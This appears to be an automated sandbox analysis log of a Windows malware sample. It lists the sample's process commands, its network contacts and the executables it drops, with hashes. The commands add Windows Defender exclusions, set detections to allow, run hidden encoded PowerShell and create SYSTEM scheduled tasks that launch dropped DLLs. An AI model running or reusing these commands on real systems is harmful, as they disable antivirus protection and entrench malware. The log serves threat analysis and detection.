"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gOoXQPhFC" /SC once /ST 04:34:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gOoXQPhFC"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gOoXQPhFC"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 08:24:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe\" Ty /Cisite_idYrv 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "mRaseIvrfxDtBOYKW"
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe Ty /Cisite_idYrv 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\amDviS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\JZfiWJf.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "eGwAoTnpAObQfPU"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\eYZkXIj.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\jsGyjxb.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\AZEYcNv.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\AoTCTed.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 05:12:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\rGBfzonX\YTmebuT.dll\",#1 /acsite_idhae 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FTXCzbcEvROqagNdd"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\rGBfzonX\YTmebuT.dll",#1 /acsite_idhae 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\rGBfzonX\YTmebuT.dll",#1 /acsite_idhae 385118
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FTXCzbcEvROqagNdd"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | shipofdestiny.com | udp |
| AT | 5.42.64.17:80 | 5.42.64.17 | tcp |
| RU | 193.233.132.175:80 | tcp | |
| US | 8.8.8.8:53 | sty.ink | udp |
| DE | 185.172.128.144:80 | 185.172.128.144 | tcp |
| US | 8.8.8.8:53 | operandotwo.com | udp |
| US | 8.8.8.8:53 | namemail.org | udp |
| US | 8.8.8.8:53 | cu82342.tw1.ru | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 172.67.152.98:443 | shipofdestiny.com | tcp |
| US | 172.67.152.98:443 | shipofdestiny.com | tcp |
| US | 172.67.160.247:443 | operandotwo.com | tcp |
| US | 172.67.200.219:443 | sty.ink | tcp |
| US | 172.67.200.219:443 | sty.ink | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| RU | 176.57.210.144:443 | cu82342.tw1.ru | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | lawyerbuyer.org | udp |
| US | 188.114.96.2:443 | lawyerbuyer.org | tcp |
| US | 188.114.96.2:443 | lawyerbuyer.org | tcp |
| US | 8.8.8.8:53 | d.392391234.xyz | udp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| US | 8.8.8.8:53 | guseman.org | udp |
| US | 172.67.173.167:443 | guseman.org | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | 89.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.152.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.64.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.200.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.160.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.210.57.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.45.164.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.173.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| DE | 185.172.128.65:80 | tcp | |
| DE | 185.172.128.65:80 | tcp | |
| US | 8.8.8.8:53 | 65.128.172.185.in-addr.arpa | udp |
| US | 188.114.96.2:443 | lawyerbuyer.org | tcp |
| US | 8.8.8.8:53 | udp | |
| DE | 185.172.128.144:80 | tcp | |
| US | 188.114.96.2:443 | lawyerbuyer.org | tcp |
| DE | 185.172.128.209:80 | 185.172.128.209 | tcp |
| US | 188.114.96.2:443 | lawyerbuyer.org | tcp |
| US | 188.114.96.2:443 | lawyerbuyer.org | tcp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 34.117.186.192:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| NL | 185.26.182.117:443 | tcp | |
| NL | 185.26.182.94:443 | tcp | |
| NL | 82.145.217.121:443 | tcp | |
| GB | 95.101.143.243:443 | tcp | |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 104.18.11.89:443 | download5.operacdn.com | tcp |
| US | 8.8.8.8:53 | 89.11.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| US | 8.8.8.8:53 | f901d83f-bf93-4ba3-a81a-54367772aec3.uuid.statstraffic.org | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | server13.statstraffic.org | udp |
| US | 8.8.8.8:53 | stun1.l.google.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| BE | 172.253.120.127:19302 | stun1.l.google.com | udp |
| BG | 185.82.216.104:443 | server13.statstraffic.org | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | 127.120.253.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.221.67.172.in-addr.arpa | udp |
| BG | 185.82.216.104:443 | server13.statstraffic.org | tcp |
| US | 8.8.8.8:53 | 219.135.221.88.in-addr.arpa | udp |
| NL | 185.26.182.123:443 | tcp | |
| NL | 185.26.182.123:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| N/A | 195.20.16.45:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 172.67.188.178:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 104.26.8.59:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 121.150.80.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.179.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 142.250.178.1:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.178.250.142.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | api4.check-data.xyz | udp |
| US | 44.240.147.44:80 | api4.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 44.147.240.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | server13.statstraffic.org | udp |
| BG | 185.82.216.104:443 | server13.statstraffic.org | tcp |
Files
memory/4204-0-0x0000015A4F430000-0x0000015A4F43C000-memory.dmp
memory/4204-1-0x00007FFB35A30000-0x00007FFB364F1000-memory.dmp
memory/4204-2-0x0000015A69A00000-0x0000015A69A10000-memory.dmp
memory/4204-3-0x0000015A6A800000-0x0000015A6A876000-memory.dmp
memory/4204-4-0x0000015A6A780000-0x0000015A6A79E000-memory.dmp
memory/4204-5-0x0000015A6A7A0000-0x0000015A6A7FE000-memory.dmp
memory/1512-6-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1512-7-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/1512-8-0x0000000002B60000-0x0000000002B70000-memory.dmp
memory/4204-9-0x00007FFB35A30000-0x00007FFB364F1000-memory.dmp
C:\Users\Admin\Pictures\kYGORkNl9EO4o6fyADcic3qo.exe
| MD5 | 5b423612b36cde7f2745455c5dd82577 |
| SHA1 | 0187c7c80743b44e9e0c193e993294e3b969cc3d |
| SHA256 | e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09 |
| SHA512 | c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c |
C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe
| MD5 | 9cd8f017fce108d15a3da05ad68dc88d |
| SHA1 | 8a934caca9bc4aae78caf22ffb40fa52d0539bd2 |
| SHA256 | 41cfcd320e71a9703685c95859dec2262cc459c3a5d6d4e2e4379d8f9695c854 |
| SHA512 | bd6fbdab2e4a67f09afb5c88441410ff5efa567da2ae0089da210f68f79e87ac7b04da43e710ec4fcf25ceef28dc13bcdff6335f37e35017f6b0039c53c4dc5b |
memory/832-36-0x0000000000D90000-0x0000000000DFE000-memory.dmp
memory/832-35-0x0000000000E70000-0x0000000000F70000-memory.dmp
memory/832-37-0x0000000000400000-0x0000000000B0D000-memory.dmp
C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe
| MD5 | fd4e39b84976a233a5ec92fbe255ff48 |
| SHA1 | 29fca043ec03807ad528fa222e9bb4039c0a64aa |
| SHA256 | 8004dce352977242b0ac40ede92b2eda494a22a3cb1366ae7336810f4cd364bc |
| SHA512 | 4f87776eb6687f636d6a8b0d931d1e789c49c624d9519a1afc1eceef385d4da3d9da1a1e7e28e4a8beb50de76d9bfab8eefc37479ea2148cbc681c0551c4a0dd |
C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe
| MD5 | c4557771f0454d0924cff29fe81f2fb1 |
| SHA1 | 905dfbc56726538788fde25dfc364509b220f3f3 |
| SHA256 | c8dba8d9f5446614284942a20ccc34a939be7ef2183f7da8e89ed4848a11cbaf |
| SHA512 | 5822384e112b7c92e1d0c2bf3d4b6017f0560c8f6fa0608881e7bd3f04acd8eab9a02df6ae8c13c22cd813aabbc6137cd27c0f72d847c0ac526a0fd7dd562e43 |
memory/4640-66-0x0000000002B20000-0x0000000002F1F000-memory.dmp
memory/4640-67-0x0000000002F20000-0x000000000380B000-memory.dmp
memory/2980-68-0x0000000002F50000-0x000000000383B000-memory.dmp
memory/2980-69-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/2980-70-0x0000000002A40000-0x0000000002E42000-memory.dmp
C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe
| MD5 | 7960d8afbbac06f216cceeb1531093bb |
| SHA1 | 008221bf66a0749447cffcb86f2d1ec80e23fc76 |
| SHA256 | f6e476e8ccb571b9d7a76234953ad428e883ff4712b0062498ba3275d9749b84 |
